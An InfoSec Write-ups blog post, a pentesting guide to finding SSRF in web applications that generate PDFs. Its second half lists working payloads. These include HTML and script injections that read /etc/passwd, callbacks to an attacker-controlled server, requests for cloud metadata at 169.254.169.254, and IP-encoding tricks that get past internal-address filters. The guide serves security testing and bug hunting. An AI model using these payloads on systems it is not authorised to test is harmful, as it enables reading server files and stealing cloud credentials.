Breaking Down SSRF on PDF Generation: A Pentesting Guide

Published in

InfoSec Write-ups

5 min readJul 21, 2023

Hello Hackers, I Hope you guys are doing well and hunting lots of bugs and dollars !

So today’s article is about the approach for hunting SSRF, I will be more focused on the PDF generation side. Let’s dive into it!

What is Server Side Request Forgery (SSRF) ?

Server side request vulnerability occurs when an attacker can manipulate the input to a web application that triggers a request from the server to a remote resource. The attacker can then use this to make requests to internal systems or other external resources, potentially gaining access to sensitive data or even taking control of the server itself.

In other layman terms you can understand like similar to CSRF but here in SSRF an adversary user is forcing back-end server to do actions on the behalf of him/her. It could be to read or update internal resources from an external network.

An SSRF vulnerability can be exploited in a number of ways, such as gaining unauthorized access to internal network resources, stealing sensitive information, or performing a denial of service (DoS) attack.

How to hunt for SSRF :-

In my recent pentest, I came through where the application is taking user input and generating PDF. Most of the time PDF generator is somewhere vulnerable.

PDF generation is a common task performed by web applications, and it sometimes requires the application to access resources outside of its environment. This includes resources on the local network as well as resources on the internet. An attacker may be able to manipulate user-supplied input to cause the PDF generation process to make unauthorized requests if the application does not properly validate and sanitize it.

You can have a look on analysis which will give you an idea that even a big tech giant also not have good SSRF protection.

SSRF in the Wild

A totally unscientific analysis of those SSRFs found in the wild

medium.com

Web applications commonly utilize PDF generation libraries to generate PDF documents. These pages usually allow users to input the data and then generate a PDF document. However, SSRF attacks can be launched if the PDF generation page does not properly validate user input.

Some of the most popular PDF generation libraries used in web applications are :-

wkhtmltopdf : This is an open source command line tool that uses the WebKit rendering engine to convert HTML and CSS into PDF documents.
TCPDF : A PHP library for generating PDF documents that supports a wide range of features, including images, graphics, and encryption.
PDFKit : A Node.js library that can be used to generate PDF documents from HTML and CSS.
iText : A Java-based library for generating PDF documents that supports a range of features, including digital signatures and form filling.
FPDF : A PHP library for generating PDF documents that is lightweight and easy to use.

Before attempting to carry out an SSRF attack on a web application, it is important to identify the specific library being used for generating PDF documents. This is because different libraries may have varying approaches to handling user input, which can impact the kind of payload that an attacker can utilize in their attack. By comprehending the library’s user input handling mechanism, we can create a more targeted and efficient payload that is customized to the particular library.

Here are several ways to identify which library a web application is using for generating PDF documents:-

Inspect the page source code and look for references to specific PDF libraries in the application’s source code or dependencies. For example, if you see references to libraries like iText, PDFtk, or Apache PDFBox, it may indicate that the application is using one of these libraries.
Use tools like Wappalyzer or BuiltWith to scan the web application and determine which libraries it is using.
Try to generate a PDF document through the web application and examine the generated file’s metadata. This can often reveal which library was used to create the PDF.
Analysing the JS files of a web application may help determine the PDF library being used. It may contain references to specific PDF libraries or plugins. These references can take the form of variable names, function names, or URLs that are used to load scripts from the library.
If you are performing white box penetration testing , Check the application’s documentation or contact the developers directly to ask which libraries are being used for PDF generation.

Detection for SSRF

If you know what library a web application is using for the pdf generation process, you can look for specific payloads on the internet. If you are still unable to figure out what library they are using using the above techniques, you definitely recommend the hit and trial approaches.

We’ll starting by identifying whether or not this application has implemented proper input validation or sanitization. So, of course, whatever field we see reflecting on the pdf after generating it, we have to attempt the injections there as well primarily HTML or CSS injection. Not only can you manipulate the input field, but you can also manipulate the target parameter name using any proxy tool such as Burp-suite or OWASP zap.

Once you’ve achieved HTML injection on it, you can most certainly escalate it to XSS or SSRF and chain further vulnerabilities to it to make it more impactful in nature.

You can try below payload, but if these payload doesn't work, might be there is some kind of security protection implemented, so you can look some other alternative payload and try.

// Basic Payload

<img src="http://yourserver.com"/>
<link rel=attachment href="http://yourserver.com">
<script> document.write(window.location) </script>
<object data="file:///etc/passwd">   
<portal src="file:///etc/passwd" id=portal>
<iframe src=file:///etc/passwd></iframe>
<embed src="file://etc/passwd>" width="400" height="400">
<style><iframe src=”http://169.254.169.254/latest/meta-data/”> 
<img src='x' onerror='document.write('<iframe src=http://169.254.169.254/latest/user-data></iframe>')'/>&text=&width=500&height=500
<meta http-equiv="refresh" content="0;url=http://169.254.169.254" />

// Read local files {try changing Different types of protocols instead of file}

<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send()
</script>

// Other Protocols 

  Dict://
  SSH://
  SFTP://
  LDAP://
  Gopher://
  TFTP://

If you try to retrieve cloud metadata using the payload below, it will most likely be blocked because internal IPs are filtered. In that case, you might try one of the methods listed below.

//Blocked

< iframe src=”http://169.254.169.254/user-data” 

//Bypasses

Converted Decimal IP: http://2852039166/latest/meta-data/
IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/
IPV6/IPV4: http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/

Dotted decimal with overflow:  http://425.510.425.510/ 
Dotless decimal:  http://2852039166/ 
Dotless decimal with overflow: http://7147006462/ 
Dotted hexadecimal:  http://0xA9.0xFE.0xA9.0xFE/ 
Dotless hexadecimal:  http://0xA9FEA9FE/ 
Dotless hexadecimal with overflow:  http://0x41414141A9FEA9FE/
Dotted octal:  http://0251.0376.0251.0376/ Dotted octal
Dotted octal with padding:  http://0251.00376.000251.0000376/
Mixed encoding (dotted octal + dotted decimal):  http://0251.254.169.254

I hope this is informative to you, and if you have any doubts or suggestions, reach out to me over Twitter; I’ll be happy to assist or learn from you.

Happy Hacking !

Twitter handle :- https://twitter.com/Xch_eater